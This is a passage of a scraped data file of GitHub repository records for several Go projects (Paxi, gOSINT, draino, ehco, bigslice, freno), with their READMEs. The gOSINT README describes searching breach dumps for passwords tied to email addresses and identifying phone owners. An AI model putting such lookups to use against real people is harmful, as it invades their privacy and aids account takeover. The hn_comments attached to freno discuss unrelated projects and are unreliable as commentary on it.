[config.json](https://github.com/ailidani/paxi/blob/master/bin/config.json).\n```\n./client -id 1.1 -config config.json\n```\nWhen flag `id` is absent, client will randomly select any server for each operation.\n\nThe algorithms can also be running in **simulation** mode, where all nodes are running in one process and transport layer is replaced by Go channels. Check [`simulation.sh`](https://github.com/ailidani/paxi/blob/master/bin/simulation.sh) script on how to run.\n\n\n# How to implement algorithms in Paxi\n\nReplication algorithm in Paxi follows the message passing model, where several message types and their handle function are registered. We use [Paxos](https://github.com/ailidani/paxi/tree/master/paxos) as an example for our step-by-step tutorial.\n\n1. Define messages, register with gob in `init()` function if using gob codec. As show in [`msg.go`](https://github.com/ailidani/paxi/blob/master/paxos/msg.go).\n\n2. Define a `Replica` structure embeded with `paxi.Node` interface.\n```go\ntype Replica struct {\n\tpaxi.Node\n\t*Paxos\n}\n```\n\nDefine handle function for each message type. For example, to handle client `Request`\n```go\nfunc (r *Replica) handleRequest(m paxi.Request) {\n\tif *adaptive {\n\t\tif r.Paxos.IsLeader() || r.Paxos.Ballot() == 0 {\n\t\t\tr.Paxos.HandleRequest(m)\n\t\t} else {\n\t\t\tgo r.Forward(r.Paxos.Leader(), m)\n\t\t}\n\t} else {\n\t\tr.Paxos.HandleRequest(m)\n\t}\n\n}\n```\n\n3. Register the messages with their handle function using `Node.Register(interface{}, func())` interface in `Replica` constructor.\n\nReplica use `Send(to ID, msg interface{})`, `Broadcast(msg interface{})` functions in Node.Socket to send messages.\n\nFor data-store related functions check `db.go` file.\n\nFor quorum types check `quorum.go` file.\n\nClient uses a simple RESTful API to submit requests. GET method with URL \"http://ip:port/key\" will read the value of given key. POST method with URL \"http://ip:port/key\" and body as the value, will write the value to key.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Nhoya/gOSINT", "link": "https://github.com/Nhoya/gOSINT", "tags": ["go", "golang", "osint", "haveibeenpwnd", "pgp", "github", "bitbucket", "git", "telegram", "scraper", "spider", "crawler", "forensics", "infosec", "security", "pentest", "shodan-api", "shodan", "axfr"], "stars": 516, "description": "OSINT Swiss Army Knife", "lang": "Go", "repo_lang": "", "readme": "# gOSINT [![Build Status](https://travis-ci.org/Nhoya/gOSINT.svg?branch=master)](https://travis-ci.org/Nhoya/gOSINT) [![Build status](https://ci.appveyor.com/api/projects/status/9qn2y2f8t5up8ww2?svg=true)](https://ci.appveyor.com/project/Nhoya/gosint) [![GitHub stars](https://img.shields.io/github/stars/Nhoya/gOSINT.svg)](https://github.com/Nhoya/gOSINT/stargazers) [![GitHub forks](https://img.shields.io/github/forks/Nhoya/gOSINT.svg)](https://github.com/Nhoya/gOSINT/network) [![Twitter](https://img.shields.io/twitter/url/https/github.com/Nhoya/gOSINT.svg?style=social&style=plastic)](https://twitter.com/intent/tweet?text=Wow:&url=https%3A%2F%2Fgithub.com%2FNhoya%2FgOSINT) [![Go Report Card](https://goreportcard.com/badge/github.com/Nhoya/gOSINT)](https://goreportcard.com/report/github.com/Nhoya/gOSINT) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/76673062a30e48bd99d499d32c0c6af0)](https://www.codacy.com/app/Nhoya/gOSINT?utm_source=github.com&utm_medium=referral&utm_content=Nhoya/gOSINT&utm_campaign=Badge_Grade) [![Mentioned in Awesome Pentest](https://awesome.re/mentioned-badge.svg)](https://github.com/enaqx/awesome-pentest)\n\nOSINT Swiss Army Knife in Go\n\nTake a look at the [develop branch](https://github.com/Nhoya/gOSINT/tree/develop) for more updates.\n\n## Introduction\n\ngOSINT is a multiplatform OSINT Swiss army knife in Golang. If you want, feel free to contribute and/or leave a feedback!\n\n## Like my project? Please consider donation :)\n\n[![Paypal Badge](https://img.shields.io/badge/Donate-PayPal-yellow.svg)](https://www.paypal.me/Nhoya) [![BTC Badge](https://img.shields.io/badge/Donate-BTC-yellow.svg)](https://pastebin.com/raw/nyDDPwaM) [![Monero Badge](https://img.shields.io/badge/Donate-XMR-yellow.svg)](https://pastebin.com/raw/dNUFqwuC) [![Ethereum Badge](https://img.shields.io/badge/Donate-Ethereum-yellow.svg)](https://pastebin.com/raw/S6XMmSiv)\n\n## What gOSINT can do\n\nCurrently `gOSINT` has different modules:\n\n- [x] git support for mail retriving (using github API, or plain clone and search)\n- [x] Search for mails, aliases and KeyID in PGP Server\n- [x] [haveibeenpwned.com/](http://haveibeenpwned.com/) search for mail in databreach\n- [x] Retrieve Telegram Public Group Message History\n- [x] Search for mail address in source\n- [x] [shodan.io](https://shodan.io) search\n- [x] Subdomain enumeration using [crt.sh](https://crt.sh)\n- [x] Given a phone number, can retrieve the owner name\n- [x] Search for password relatives to email address :P\n- [x] Reverse Whois given Email Address or Name\n\nA complete features list and roadmap is available under [Projects Tab](https://github.com/Nhoya/gOSINT/projects)\n\n## Installation\n\n### Dependencies\n\ngOSINT currently depends from [tesseract-ocr](https://github.com/tesseract-ocr/) so you need to install on your system `tesseract-ocr`, `libtesseract-dev` and `libleptonica-dev`\n\n### Install on a go-dependent way (is the easier and faster way)\n\nYou can install `gOSINT` using `go get` with a simple \n\n`go get github.com/Nhoya/gOSINT/cmd/gosint`\n\n### Install On Windows\n\nCheck the AppVeyor Build page for builds\n\n## Manual Building\n\n### Building On Linux\n\nBuild gOSINT on linux is really easy, you just need to install [dep](https://github.com/golang/dep), clone the repository and `make` and `make install`\n\n### Building On Windows\n\nIf you have `make` installed you can follow the Linux instructions (and skip `make install`) otherwise be sure to have [dep](https://github.com/golang/dep) installed, clone the directory and run\n\n```bash\ndep ensure\ngo build cmd/gosint.go\n```\n\n### Running on Docker\n\ngOSINT currently supports container only for the rolling release, after the 1.0.0 release we will start working on a versioned Dockerfile.\nIf you want to try it out:\n\n```\nmkdir gOSINT\nwget https://raw.githubusercontent.com/Nhoya/gOSINT/develop/build/package/Dockerfile\ndocker build gosint .\ndocker run gosint bash\n```\n\n## Usage\n\n```bash\nusage: gOSINT [] [ ...]\n\nAn Open Source INTelligence Swiss Army Knife\n\nFlags:\n --help Show context-sensitive help (also try --help-long and --help-man).\n --json Enable JSON Output\n --debug Enable Debug Output\n --version Show application version.\n --verify Verify URL Status Code\n\nArgs:\n Domain URL\n\nCommands:\n help [...]\n Show help.\n\n\n git [] \n Get Emails and Usernames from repositories\n\n --method=[clone|gh] Specify the API to use or plain clone\n --recursive Search for each repository of the user\n\n pwd [] ...\n Check dumps for Email address using haveibeenpwned.com\n\n --get-passwords Search passwords for mail\n\n pgp ...\n Get Emails, KeyID and Aliases from PGP Keyring\n\n\n shodan [] ...\n Get info on host using shodan.io\n\n --new-scan Schedule a new shodan scan (1 Shodan Credit will be deducted)\n --honeypot Get honeypot probability\n\n shodan-query \n Send a query to shodan.io\n\n\n axfr [] ...\n Subdomain enumeration using crt.sh\n\n --verify Verify URL Status Code\n\n pni ...\n Retrieve info about a give phone number\n\n\n telegram [] \n Telegram public groups and channels scraper\n\n --start=START Start message #\n --end=END End message #\n --grace=15 The number of messages that will be considered deleted before the scraper stops\n --dump Creates and resume messages from dumpfile\n\n rev-whois \n Find domains for name or email address\n\n```\n\n## Configuration file\n\nThe default configuration file is in `$HOME/.config/gosint.toml` for linux environment and `./config/toml` for windows env\n\nYou can place it in different paths, load prioriy is:\n\n- `.`\n- `./config/ or $HOME/.config/`\n- `/etc/gosint/`\n\nIf some API Keys are missing insert it there\n\n## PGP module Demo (**OUTDATED**)\n\n[![asciicast](https://asciinema.org/a/21PCpbgFqyHiTbPINexHKEywj.png)](https://asciinema.org/a/21PCpbgFqyHiTbPINexHKEywj)\n\n## Pwnd module Demo (**OUTDATED**)\n\n[![asciicast](https://asciinema.org/a/x9Ap0IRcNNcLfriVujkNUhFSF.png)](https://asciinema.org/a/x9Ap0IRcNNcLfriVujkNUhFSF)\n\n## Telegram Crawler Demo (**OUTDATED**)\n\n[![asciicast](https://asciinema.org/a/nbRO9FNpjiYXAKeI87xn29j9z.png)](https://asciinema.org/a/nbRO9FNpjiYXAKeI87xn29j9z)\n\n## Shodan module Demo (**OUTDATED**)\n\n[![asciicast](https://asciinema.org/a/9lfzAZ65n9MJCkrUrxoHZQYwP.png)](https://asciinema.org/a/9lfzAZ65n9MJCkrUrxoHZQYwP)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "planetlabs/draino", "link": "https://github.com/planetlabs/draino", "tags": ["kubernetes", "kubernetes-node", "autoremediation", "drain"], "stars": 516, "description": "Automatically cordon and drain Kubernetes nodes based on node conditions", "lang": "Go", "repo_lang": "", "readme": "# draino [![Docker Pulls](https://img.shields.io/docker/pulls/planetlabs/draino.svg)](https://hub.docker.com/r/planetlabs/draino/) [![Godoc](https://img.shields.io/badge/godoc-reference-blue.svg)](https://godoc.org/github.com/planetlabs/draino) [![Travis](https://img.shields.io/travis/com/planetlabs/draino.svg?maxAge=300)](https://travis-ci.com/planetlabs/draino/) [![Codecov](https://img.shields.io/codecov/c/github/planetlabs/draino.svg?maxAge=3600)](https://codecov.io/gh/planetlabs/draino/)\nDraino automatically drains Kubernetes nodes based on labels and node\nconditions. Nodes that match _all_ of the supplied labels and _any_ of the\nsupplied node conditions will be cordoned immediately and drained after a\nconfigurable `drain-buffer` time.\n\nDraino is intended for use alongside the Kubernetes [Node Problem Detector](https://github.com/kubernetes/node-problem-detector)\nand [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler).\nThe Node Problem Detector can set a node condition when it detects something\nwrong with a node - for instance by watching node logs or running a script. The\nCluster Autoscaler can be configured to delete nodes that are underutilised.\nAdding Draino to the mix enables autoremediation:\n\n1. The Node Problem Detector detects a permanent node problem and sets the\n corresponding node condition.\n2. Draino notices the node condition. It immediately cordons the node to prevent\n new pods being scheduled there, and schedules a drain of the node.\n3. Once the node has been drained the Cluster Autoscaler will consider it\n underutilised. It will be eligible for scale down (i.e. termination) by the\n Autoscaler after a configurable period of time.\n\n## Usage\n```\n$ docker run planetlabs/draino /draino --help\nusage: draino [] ...\n\nAutomatically cordons and drains nodes that match the supplied conditions.\n\nFlags:\n --help Show context-sensitive help (also try --help-long and --help-man).\n -d, --debug Run with debug logging.\n --listen=\":10002\" Address at which to expose /metrics and /healthz.\n --kubeconfig=KUBECONFIG Path to kubeconfig file. Leave unset to use in-cluster config.\n --master=MASTER Address of Kubernetes API server. Leave unset to use in-cluster config.\n --dry-run Emit an event without cordoning or draining matching nodes.\n --max-grace-period=8m0s Maximum time evicted pods will be given to terminate gracefully.\n --eviction-headroom=30s Additional time to wait after a pod's termination grace period for it to have been deleted.\n --drain-buffer=10m0s Minimum time between starting each drain. Nodes are always cordoned immediately.\n --node-label=\"foo=bar\" (DEPRECATED) Only nodes with this label will be eligible for cordoning and draining. May be specified multiple times.\n --node-label-expr=\"metadata.labels.foo == 'bar'\"\n This is an expr string https://github.com/antonmedv/expr that must return true or false. See `nodefilters_test.go` for examples\n --namespace=\"kube-system\" Namespace used to create leader election lock object.\t\n --leader-election-lease-duration=15s\n Lease duration for leader election.\n --leader-election-renew-deadline=10s\n Leader election renew deadline.\n --leader-election-retry-period=2s\n Leader election retry period.\n --skip-drain Whether to skip draining nodes after cordoning.\n --evict-daemonset-pods Evict pods that were created by an extant DaemonSet.\n --evict-emptydir-pods Evict pods with local storage, i.e. with emptyDir volumes.\n --evict-unreplicated-pods Evict pods that were not created by a replication controller.\n --protected-pod-annotation=KEY[=VALUE] ...\n Protect pods with this annotation from eviction. May be specified multiple times.\n\nArgs:\n Nodes for which any of these conditions are true will be cordoned and drained.\n```\n\n### Labels and Label Expressions\n\nDraino allows filtering the elligible set of nodes using `--node-label` and `--node-label-expr`.\nThe original flag `--node-label` is limited to the boolean AND of the specified labels. To express more complex predicates, the new `--node-label-expr`\nflag allows for mixed OR/AND/NOT logic via https://github.com/antonmedv/expr.\n\nAn example of `--node-label-expr`:\n\n```\n(metadata.labels.region == 'us-west-1' && metadata.labels.app == 'nginx') || (metadata.labels.region == 'us-west-2' && metadata.labels.app == 'nginx')\n```\n\n## Considerations\nKeep the following in mind before deploying Draino:\n\n* Always run Draino in `--dry-run` mode first to ensure it would drain the nodes\n you expect it to. In dry run mode Draino will emit logs, metrics, and events\n but will not actually cordon or drain nodes.\n* Draino immediately cordons nodes that match its configured labels and node\n conditions, but will wait a configurable amount of time (10 minutes by default)\n between draining nodes. i.e. If two nodes begin exhibiting a node condition\n simultaneously one node will be drained immediately and the other in 10 minutes.\n* Draino considers a drain to have failed if at least one pod eviction triggered\n by that drain fails. If Draino fails to evict two of five pods it will consider\n the Drain to have failed, but the remaining three pods will always be evicted.\n* Pods that can't be evicted by the cluster-autoscaler won't be evicted by draino.\n See annotation `\"cluster-autoscaler.kubernetes.io/safe-to-evict\": \"false\"` in\n [cluster-autoscaler documentation](https://github.com/kubernetes/autoscaler/blob/master/cluster-autoscaler/FAQ.md#what-types-of-pods-can-prevent-ca-from-removing-a-node)\n\n## Deployment\n\nDraino is automatically built from master and pushed to the [Docker Hub](https://hub.docker.com/r/planetlabs/draino/).\nBuilds are tagged `planetlabs/draino:$(git rev-parse --short HEAD)`.\n\n**Note:** As of September, 2020 we no longer publish `planetlabs/draino:latest`\nin order to encourage explicit and pinned releases.\n\nAn [example Kubernetes deployment manifest](manifest.yml) is provided.\n\n## Monitoring\n\n### Metrics\nDraino provides a simple healthcheck endpoint at `/healthz` and Prometheus\nmetrics at `/metrics`. The following metrics exist:\n\n```bash\n$ kubectl -n kube-system exec -it ${DRAINO_POD} -- apk add curl\n$ kubectl -n kube-system exec -it ${DRAINO_POD} -- curl http://localhost:10002/metrics\n# HELP draino_cordoned_nodes_total Number of nodes cordoned.\n# TYPE draino_cordoned_nodes_total counter\ndraino_cordoned_nodes_total{result=\"succeeded\"} 2\ndraino_cordoned_nodes_total{result=\"failed\"} 1\n# HELP draino_drained_nodes_total Number of nodes drained.\n# TYPE draino_drained_nodes_total counter\ndraino_drained_nodes_total{result=\"succeeded\"} 1\ndraino_drained_nodes_total{result=\"failed\"} 1\n```\n\n### Events\nDraino is generating event for every relevant step of the eviction process. Here is an example that ends with a reason `DrainFailed`. When everything is fine the last event for a given node will have a reason `DrainSucceeded`.\n```\n> kubectl get events -n default | grep -E '(^LAST|draino)'\n\nLAST SEEN FIRST SEEN COUNT NAME KIND TYPE REASON SOURCE MESSAGE\n5m 5m 1 node-demo.15fe0c35f0b4bd10 Node Warning CordonStarting draino Cordoning node\n5m 5m 1 node-demo.15fe0c35fe3386d8 Node Warning CordonSucceeded draino Cordoned node\n5m 5m 1 node-demo.15fe0c360bd516f8 Node Warning DrainScheduled draino Will drain node after 2020-03-20T16:19:14.91905+01:00\n5m 5m 1 node-demo.15fe0c3852986fe8 Node Warning DrainStarting draino Draining node\n4m 4m 1 node-demo.15fe0c48d010ecb0 Node Warning DrainFailed draino Draining failed: timed out waiting for evictions to complete: timed out\n```\n\n### Conditions\nWhen a drain is scheduled, on top of the event, a condition is added to the status of the node. This condition will hold information about the beginning and the end of the drain procedure. This is something that you can see by describing the node resource:\n\n```\n> kubectl describe node {node-name}\n......\nUnschedulable: true\nConditions:\n Type Status LastHeartbeatTime LastTransitionTime Reason Message\n ---- ------ ----------------- ------------------ ------ -------\n OutOfDisk False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientDisk kubelet has sufficient disk space available\n MemoryPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientMemory kubelet has sufficient memory available\n DiskPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasNoDiskPressure kubelet has no disk pressure\n PIDPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientPID kubelet has sufficient PID available\n Ready True Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:02:09 +0100 KubeletReady kubelet is posting ready status. AppArmor enabled\n ec2-host-retirement True Fri, 20 Mar 2020 15:23:26 +0100 Fri, 20 Mar 2020 15:23:26 +0100 NodeProblemDetector Condition added with tooling\n DrainScheduled True Fri, 20 Mar 2020 15:50:50 +0100 Fri, 20 Mar 2020 15:23:26 +0100 Draino Drain activity scheduled 2020-03-20T15:50:34+01:00\n```\n\n Later when the drain activity will be completed the condition will be amended letting you know if it succeeded of failed:\n\n```\n> kubectl describe node {node-name}\n......\nUnschedulable: true\nConditions:\n Type Status LastHeartbeatTime LastTransitionTime Reason Message\n ---- ------ ----------------- ------------------ ------ -------\n OutOfDisk False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientDisk kubelet has sufficient disk space available\n MemoryPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientMemory kubelet has sufficient memory available\n DiskPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasNoDiskPressure kubelet has no disk pressure\n PIDPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientPID kubelet has sufficient PID available\n Ready True Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:02:09 +0100 KubeletReady kubelet is posting ready status. AppArmor enabled\n ec2-host-retirement True Fri, 20 Mar 2020 15:23:26 +0100 Fri, 20 Mar 2020 15:23:26 +0100 NodeProblemDetector Condition added with tooling\n DrainScheduled True Fri, 20 Mar 2020 15:50:50 +0100 Fri, 20 Mar 2020 15:23:26 +0100 Draino Drain activity scheduled 2020-03-20T15:50:34+01:00 | Completed: 2020-03-20T15:50:50+01:00\n ```\n\nIf the drain had failed the condition line would look like:\n```\n DrainScheduled True Fri, 20 Mar 2020 15:50:50 +0100 Fri, 20 Mar 2020 15:23:26 +0100 Draino Drain activity scheduled 2020-03-20T15:50:34+01:00| Failed:2020-03-20T15:55:50+01:00\n```\n\n## Retrying drain\n\nIn some cases the drain activity may failed because of restrictive Pod Disruption Budget or any other reason external to Draino. The node remains `cordon` and the drain condition \nis marked as `Failed`. If you want to reschedule a drain tentative on that node, add the annotation: `draino/drain-retry: true`. A new drain schedule will be created. Note that the annotation is not modified and will trigger retries in loop in case the drain fails again.\n\n```\nkubectl annotate node {node-name} draino/drain-retry=true\n```\n## Modes\n\n### Dry Run\nDraino can be run in dry run mode using the `--dry-run` flag.\n\n### Cordon Only\nDraino can also optionally be run in a mode where the nodes are only cordoned, and not drained. This can be achieved by using the `--skip-drain` flag.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Ehco1996/ehco", "link": "https://github.com/Ehco1996/ehco", "tags": ["relay", "echo"], "stars": 516, "description": "ehco is a network \u029arelay\u025e tool and a typo :)", "lang": "Go", "repo_lang": "", "readme": "# Ehco\n\nehco is a network relay tool and a typo :)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/Ehco1996/ehco)](https://goreportcard.com/report/github.com/Ehco1996/ehco)\n[![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/Ehco1996/ehco)\n[![Docker Pulls](https://img.shields.io/docker/pulls/ehco1996/ehco)](https://hub.docker.com/r/ehco1996/ehco)\n\n## Quick Start\n\nlet's see some examples\n\n> relay all tcp traffic from `0.0.0.0:1234` to `0.0.0.0:5201`\n\n`ehco -l 0.0.0.0:1234 -r 0.0.0.0:5201`\n\n> also relay udp traffic to `0.0.0.0:5201`\n\n`ehco -l 0.0.0.0:1234 -r 0.0.0.0:5201 -ur 0.0.0.0:5201`\n\n## Advanced Usage\n\nTBD, for now, you can see more examples in [ReadmeCN](README.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "grailbio/bigslice", "link": "https://github.com/grailbio/bigslice", "tags": ["cluster", "computing", "go", "golang", "mapreduce", "bigdata", "machinelearning", "etl"], "stars": 516, "description": "A serverless cluster computing system for the Go programming language", "lang": "Go", "repo_lang": "", "readme": "# Bigslice\n\nBigslice is a serverless cluster data processing system for [Go](https://golang.org).\nBigslice exposes composable API\nthat lets the user express\ndata processing tasks in terms of a series of\ndata transformations that invoke user code.\nThe Bigslice runtime then\ntransparently parallelizes and distributes the work,\nusing the [Bigmachine](https://github.com/grailbio/bigmachine)\nlibrary to create an ad hoc cluster on a cloud provider.\n\n- website: [bigslice.io](https://bigslice.io/)\n- API documentation: [godoc.org/github.com/grailbio/bigslice](https://godoc.org/github.com/grailbio/bigslice)\n- issue tracker: [github.com/grailbio/bigslice/issues](https://github.com/grailbio/bigslice/issues)\n- [![CI](https://github.com/grailbio/bigslice/workflows/CI/badge.svg)](https://github.com/grailbio/bigslice/actions?query=workflow%3ACI) [![Full Test](https://github.com/grailbio/bigslice/workflows/Full%20Test/badge.svg)](https://github.com/grailbio/bigslice/actions?query=workflow%3A%22Full+Test%22)\n\n# Developing Bigslice\n\nBigslice uses Go modules to capture its dependencies;\nno tooling other than the base Go install is required.\n```\n$ git clone https://github.com/grailbio/bigslice\n$ cd bigslice\n$ GO111MODULE=on go test\n```\n\nIf tests fail with `socket: too many open files` errors, try increasing the maximum number of open files.\n```\n$ ulimit -n 2000\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "github/freno", "link": "https://github.com/github/freno", "tags": ["mysql", "replication", "high-availability", "throttle", "vitess", "proxysql"], "stars": 516, "description": "freno: cooperative, highly available throttler service", "lang": "Go", "repo_lang": "", "readme": "# freno\n\n[![build status](https://github.com/github/freno/actions/workflows/main.yml/badge.svg)](https://github.com/github/freno/actions/workflows/main.yml) [![downloads](https://img.shields.io/github/downloads/github/freno/total.svg)](https://github.com/github/freno/releases) [![release](https://img.shields.io/github/release/github/freno.svg)](https://github.com/github/freno/releases)\n\nCooperative, highly available throttler service: clients use `freno` to throttle writes to a resource.\n\nCurrent implementation can throttle writes to (multiple) MySQL clusters, based on replication status for those clusters. `freno` will throttle cooperative clients when replication lag exceeds a pre-defined threshold.\n\n`freno` dynamically adapts to changes in server inventory; it can further be controlled by the user to force throttling of certain apps.\n\n`freno` is highly available and uses `raft` consensus protocol to decide leadership and to pass user events between member nodes.\n\n\n### Cooperative\n\n`freno` collects data from backend stores (at this time MySQL only) and has the logic to answer the question \"may I write to the backend store?\"\n\nClients (application, scripts, jobs) are expected to consult with `freno`. `freno` is not a proxy between the client and the backend store. It merely observes the store and states \"you're good to write\" or \"you should stop writing\". Clients are expected to consult with `freno` and respect its recommendation.\n\n### Stores and apps\n\n`freno` collects data per data store. E.g. when probing MySQL clusters it will collect replication lag per cluster, independently. Backend store metrics are collected automatically and represent absolute truths.\n\n`freno` serves clients, identified as _apps_. Since `freno` is cooperative, it trusts apps to identify themselves. Apps can be managed: `freno` can be instructed to forcibly throttle a certain app. This is so as to enable other, high priority apps to run to completion. `freno` merely accepts instructions on who to throttle, and does not have scheduling/prioritization logic of its own.\n\n### MySQL\n\n`freno` is originally designed to provide a unified, self adapting solution to MySQL throttling: controlling writes while maintaining low replication lag.\n\n`freno` is configured with a pre-defined list of MySQL clusters. This may includes credentials, lag (or other) inspection query, and expected thresholds. For each cluster, `freno` needs to know what servers to probe and collect data from. For each cluster, you may provide this list:\n\n- static, hard coded list of `hostname[:port]`\n- dynamic. Hosts may come and go, and throttling may adapt to these changes. Supported dynamic options:\n - via `haproxy`: provide `freno` with a `haproxy` URL and backend/pool name, and `freno` will periodically parse the list of enabled servers in that pool and dynamically adapt to probe it.\n\nRead more about [freno and MySQL throttling](doc/mysql.md)\n\n### Use cases\n\n`freno` is useful for bulk operations: massive loading/archiving tasks, schema migrations, mass updates. Such operations typically walk through thousands to millions of rows and may cause undesired effects such as MySQL replication lags. By breaking these tasks to small subtasks (e.g. `100` rows at a time), and by consulting `freno` before applying each such subtask, we are able to achieve the same result without ill effect to the database and to the application that uses it.\n\n`freno` can also be used to determine actual lag to infer validity of replicas. This can assist in mitigating write-then-read pains of master reads. See [here](doc/http.md#specialized-requests).\n\n### HTTP\n\n`freno` serves requests via `HTTP`. The most important request is the `check` request: \"May this app write to this store?\". `freno` appreciates `HEAD` requests (`GET` are also accepted, with more overhead) and responds with status codes:\n\n- `200` (OK): Application may write to data store\n- `404` (Not Found): Unknown metric name.\n- `417` (Expectation Failed): Requesting application is explicitly forbidden to write.\n- `429` (Too Many Requests): Do not write. A normal state indicating the store's state does not meet expected threshold.\n- `500` (Internal Server Error): Internal error. Do not write.\n\nRead more on [HTTP requests & responses](doc/http.md)\n\n### Clients\n\nClients will commonly issue `/check/...` requests via `HEAD`.\n\nClients can be expected to issue many requests per second. `freno` is lightweight in resources. It should be just fine to hit `freno` hundreds of times per second. It depends on your hardware and resources, of course.\n\nIt makes sense to hit `freno` in the whereabouts of the granularity one is looking at. If your client is to throttle on a `1000ms` replication lag, checking `freno` `200` times per sec may be overdoing it. However if you wish to keep your clients naive and without caching this should be fine.\n\nRead more on [clients](doc/clients.md)\n\n### Raft\n\n`freno` uses `raft` to provide high availability. `freno` nodes will compete for _leadership_ and only the leader will collect metrics and should serve clients.\n\nRead more on `raft` and [High Availability](doc/high-availability.md)\n\n### Configuration\n\nSee [sample config file](resources/freno.conf.sample.json). Also find:\n\n- [General/raft configuration](doc/high-availability.md#configuration) dissection\n- [MySQL-specific configuration](doc/mysql.md#configuration) dissection\n\n### Deployment\n\nSee [deployment docs](doc/deploy.md) for suggestions on a recommended `freno` deployment setup.\n\n### Resources\n\nYou may find various [resources](resources/) for setting up `freno` in your environment.\n\n[freno-client](https://github.com/github/freno-client) is our Ruby client for `freno`, open sourced and available as a Ruby Gem.\n\n### What's in a name?\n\n\"Freno\" is Spanish for \"brake\", as in _car brake_. Basically we just wanted to call it \"throttler\" or \"throttled\" but both these names are in use by multiple other repositories and we went looking for something else. When we looked up the word \"freno\" in a dictionary, we found the following sentence:\n\n> Echa el freno, magdaleno!\n\nThis reminded us of the 80's and that was it.\n\n### Project status\n\nThis project is under active development.\n\n### Contributing\n\nThis repository is [open to contributions](.github/CONTRIBUTING.md). Please also see [code of conduct](.github/CODE_OF_CONDUCT.md)\n\n### License\n\nThis project is released under the [MIT LICENSE](LICENSE). Please note it includes 3rd party dependencies release under their own licenses; these are found under [vendor](https://github.com/github/freno/tree/master/vendor).\n\n### Authors\n\nAuthored by GitHub Engineering\n", "readme_type": "markdown", "hn_comments": "10 years ago I released the first version of OpenMVG Feb 8, 2013 and I thought it would be nice to summarize my learning on 10 years of OpenMVG to celebrate these milestones.\ud835\udc47\ud835\udc3f;\ud835\udc37\ud835\udc45\nOpenMVG is my attempt to create a project that allows individuals to learn 3D reconstruction from images. Through working on the project, I have gained valuable knowledge on various fronts and have greatly enjoyed the experience. Sharing this journey with others, discussing and collaborating has been extremely rewarding and helped me being a better developer, scientist and better person.In this note I reflect on 4 points that matters when creating an open source project and share a take home message for each :\n- Build the necessary code and start from scratch\n- Make the entire toolchain open and usable freely\n- Maintain and contribute to the project in a long term manner\n- Getting contributionsFrom a Reddit post[1] by one of the coders involved in the effort. Post contains a video summary.Interesting React wrapper for existing pure JS/CSS framework developed by the French Government. All Open Source and maintained.Also interesting is the https://code.gouv.fr/ where one can find repos of tools and sites across many state organisations.[1]: https://www.reddit.com/r/reactjs/comments/10gwean/the_french...Maybe giving them a git GUI rather than commands to run would be better. You have to merge their work somehow. Limiting the commands they can use would be helpful. You might consider using Bitbucket, which has much better branch & operation permission capabilities, like being able to block force pushes based on branch naming patternstl;Dr this sounds like a people / process issue more than a tooling issue. Try to understand why they feel so rushed that they don't slow down to do it the right way. I suspect certain (anecdotal) cultural traits endemic in hardware companies.> my team is generally unfamiliar with coding, and if they are, aren\u2019t up to date on best practices, as it is not their primary job.Slightly off topic but this such a problem nowadays. Coding is everywhere now but it's treated like \"it's only software\", especially from people who are in more traditional engineering disciplines.This is partly a cultural issue but it's also technical. Software engineering / coding workflows are expected to be roughly the same whenever there is coding involved. In classical engineering the processes and the mental models of how to develop a product are completely different to modern software engineering which creates the tooling vacuum that you describe.Have you tried GitHub Desktop? https://desktop.github.com/It looks cool. You'll forgive me for not trying every example. However,1. It doesn't seem to work in Microsoft Edge when the default Enhanced Security is turned on. You might need to ask people to turn that off. I'm not sure about a workaround. It panics with insufficient stack space.2. How does it pay its own bills? If you get bored with it, what will happen to it? I'm sure Codecademy has a revenue strategy.Just curious!I clicked \"just code\" on the landing page and it took me to a page where the left pane showed an empty (black) terminal and the right one a python shell. Looking at the developer tools I saw a message in reponse to my hello world input saying that I should type 1+2. But it was never displayed.Then based on this hint, clicking around I managed to reveal the tutorial (showing up on the right). So it seems that there is a bug in the navigation or maybe the \"just code\" link on the landing points to the wrong place.Awesome! will try this out with my 10 year old and 6 year old who I want to get started with coding, as I'm not so keen on kid-focused options which abstract the actual coding away with \"cute\" visual representations (conditionals, loops, variables are not difficult concepts to grasp). IMO Ruby is the best language for teaching coding to kids (I taught it to my daughter when she was 10, years ago, she's now a SWE with a ChemEng degree) but there are more tools for Python these days, so perhaps a better choice for my younger ones. \nThanks for making open source!Does anyone know a good resource for someone who was very familiar with older Python (early 2.x) and would like to get up to speed on the latest Python along with current/best practices?Related:Show HN: Futurecoder \u2013 A free online interactive Python course - https://news.ycombinator.com/item?id=28737779 - Oct 2021 (24 comments)looks cooltried the code playground, but seems there is no intellisense?i think that would be very useful to learningLooks great, and I love that it requires no account - 